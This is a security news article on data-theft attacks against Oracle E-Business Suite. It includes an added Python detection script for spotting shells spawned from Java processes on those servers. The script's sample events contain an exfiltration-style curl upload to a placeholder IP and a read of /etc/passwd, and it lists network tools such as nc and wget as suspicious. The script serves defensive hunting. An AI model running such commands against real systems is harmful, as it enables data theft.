The Washington Post reportedly confirmed Nov. 6 that it is one of the victims in the wave of Oracle E-Business Suite (EBS) zero-day attacks.
These attacks are believed to revolve around data leaks and extortion at the hands of the FIN11 ransomware gang.
SC Media reported on Oct. 28 that, while not yet proven, security pros theorize that the financially motivated threat group FIN11 is behind the attacks, mainly because the group is known to frequently deploy Clop ransomware.
News of the Oracle EBS attack on the Washington Post comes not long after Clop posted on its leak site that the high-profile newspaper was among its victims.
The list of known victims is growing: Harvard University had more than one terabyte of stolen data published last month, and major companies such as Schneider Electric also confirmed a leak close to 3 TB.
Other organizations affected include Envoy Air, a subsidiary of American Airlines, South Africa’s Wits University, and Emerson.
“Many haven't been disclosed yet because Clop tends to wait a few weeks before posting data to put pressure on ransom payments,” said Certis Foster, senior threat hunter lead at Deepwatch.
Foster said security teams should first verify that their Oracle EBS servers are patched against CVE-2025-61882, rated critical with a CVSS score of 9.8. Second, they should hunt backwards from August for signs that the organization was already hit, since exploitation began months before victims were notified.
“Keep an eye out for unusual activity on your Oracle EBS servers, such as outbound data transfers, suspicious account access, and bash shells spawned from Java processes running under the ‘applmgr’ account,” said Foster. “The actor stole credentials and hid inside systems for months before sending ransom demands. We can't ignore that.”
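The hunt Foster describes can be turned into a simple check over process-creation telemetry: flag any shell (or data-transfer tool) whose parent is a Java process running as the EBS application owner, restricted to the lookback window he recommends. The script below is an added illustration and is not from the article, Deepwatch, or Oracle. The JSON field names (`ts`, `user`, `image`, `parent_image`, `cmdline`), the sample events, the host names and the 203.0.113.10 address are all constructed for this example; map them onto your EDR or auditd schema before use. The list of tool names treated as suspicious is an assumption, not a published indicator.

```python
"""Hunt for shells spawned from Java under 'applmgr' on Oracle EBS hosts.

Added example (not code from the article or any vendor). It applies the
heuristic described in the text to process-creation events, one JSON
object per line, and returns the events that match within a lookback window.
All field names and sample data below are constructed for illustration.
"""
import json
from datetime import datetime, timezone

# Assumed names; extend to match the binaries present on your hosts.
SHELLS = {"bash", "sh", "dash", "ksh", "zsh"}
NETWORK_TOOLS = {"curl", "wget", "nc", "ncat", "scp", "sftp"}
JAVA_BINARIES = {"java"}

# Constructed sample telemetry for one EBS application tier host.
SAMPLE_EVENTS = """\
{"ts":"2025-06-20T22:41:10Z","host":"ebs-app01","user":"applmgr","pid":38810,"ppid":38102,"parent_image":"/u01/app/jdk/bin/java","image":"/bin/bash","cmdline":"bash -c id"}
{"ts":"2025-08-14T03:12:09Z","host":"ebs-app01","user":"applmgr","pid":41233,"ppid":40817,"parent_image":"/u01/app/jdk/bin/java","image":"/bin/bash","cmdline":"bash -c 'cat /etc/passwd'"}
{"ts":"2025-08-14T03:13:40Z","host":"ebs-app01","user":"applmgr","pid":41990,"ppid":40817,"parent_image":"/u01/app/jdk/bin/java","image":"/usr/bin/curl","cmdline":"curl -s -T /tmp/out.tgz http://203.0.113.10/u"}
{"ts":"2025-09-02T11:05:00Z","host":"ebs-app01","user":"applmgr","pid":45001,"ppid":40817,"parent_image":"/u01/app/jdk/bin/java","image":"/u01/app/jdk/bin/java","cmdline":"java -jar worker.jar"}
{"ts":"2025-09-03T02:00:00Z","host":"ebs-app01","user":"oracle","pid":45220,"ppid":1200,"parent_image":"/usr/sbin/crond","image":"/bin/bash","cmdline":"bash /home/oracle/backup.sh"}
"""


def _basename(path: str) -> str:
    """Last path component, e.g. '/bin/bash' -> 'bash'."""
    return path.rsplit("/", 1)[-1]


def _parse_ts(value: str) -> datetime:
    """Parse an ISO-8601 timestamp; a trailing 'Z' is treated as UTC."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def classify(event: dict, user: str = "applmgr"):
    """Return 'shell', 'network-tool', or None for one process-creation event.

    A hit requires all three: the process runs as the EBS owner account, its
    parent image is a Java binary, and the child is a shell or transfer tool.
    """
    if event.get("user") != user:
        return None
    if _basename(event.get("parent_image", "")) not in JAVA_BINARIES:
        return None
    child = _basename(event.get("image", ""))
    if child in SHELLS:
        return "shell"
    if child in NETWORK_TOOLS:
        return "network-tool"
    return None


def hunt(lines, since_iso: str):
    """Scan JSON-lines events at or after `since_iso`; return (event, reason) hits.

    The window is deliberately a parameter: the text recommends looking back
    to at least August, and widening it is a one-line change.
    """
    since = _parse_ts(since_iso)
    if since.tzinfo is None:
        since = since.replace(tzinfo=timezone.utc)
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if _parse_ts(event["ts"]) < since:
            continue
        reason = classify(event)
        if reason:
            hits.append((event, reason))
    return hits


if __name__ == "__main__":
    for ev, reason in hunt(SAMPLE_EVENTS.splitlines(), "2025-08-01T00:00:00Z"):
        print(f"{ev['ts']} {ev['host']} pid={ev['pid']} {reason}: {ev['cmdline']}")
```

With the August cutoff, the constructed sample yields two hits: the bash spawned from Java (pid 41233) and the curl upload from the same parent (pid 41990). The June event is outside the window, the Java-to-Java spawn is normal, and the cron-launched bash runs as a different user with a non-Java parent. Real telemetry will need the same parent-image resolution that an EDR does; if your source only gives `ppid`, build a pid-to-image map per host first.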
Shane Barney, chief information security officer at Keeper Security, added that the breach linked to Oracle’s E-Business Suite platform highlights a growing shift in how attackers operate. Instead of targeting individual organizations, Barney said threat actors now focus on the shared platforms that underpin entire industries.
“By compromising one widely used system, they can reach dozens of victims at once, exploiting the trust those services hold,” said Barney.
“The reality is that third-party platforms are now part of every organization’s attack surface. The priority should be understanding where these systems connect internally, what data and credentials they have access to and how those connections are secured. Visibility into those dependencies allows teams to contain exposure quickly and limit downstream impact.”
Heath Renfrow, co-founder and chief information security officer, at Fenix24, said the expanding list of confirmed victims reinforces what we’ve been warning about for months: this Oracle E-Business Suite campaign is not a single-event compromise — it's an expansive supply chain intrusion affecting highly trusted systems at scale.
“Once attackers get a foothold in ERP environments like EBS, they gain privileged access to financial data, HR records, supplier systems, and core operational workflows. These platforms often sit at the center of business operations and are historically under-monitored compared to perimeter systems, which means adversaries can dwell silently and exfiltrate data before anyone notices.”
Damon Small, board member at Xcape, Inc., added that the inclusion of the Washington Post among Oracle EBS attack victims underscores the campaign's wide reach and high stakes, targeting vital data across various industries.
"With the likely goal of large-scale data theft, teams need to operate under the assumption that their EBS environments have been compromised and prioritize forensic investigation, not just patching," said Small. "Of particular concern is that data stolen from Schneider Electric could lead to future attacks against proprietary industrial control systems (ICS) devices."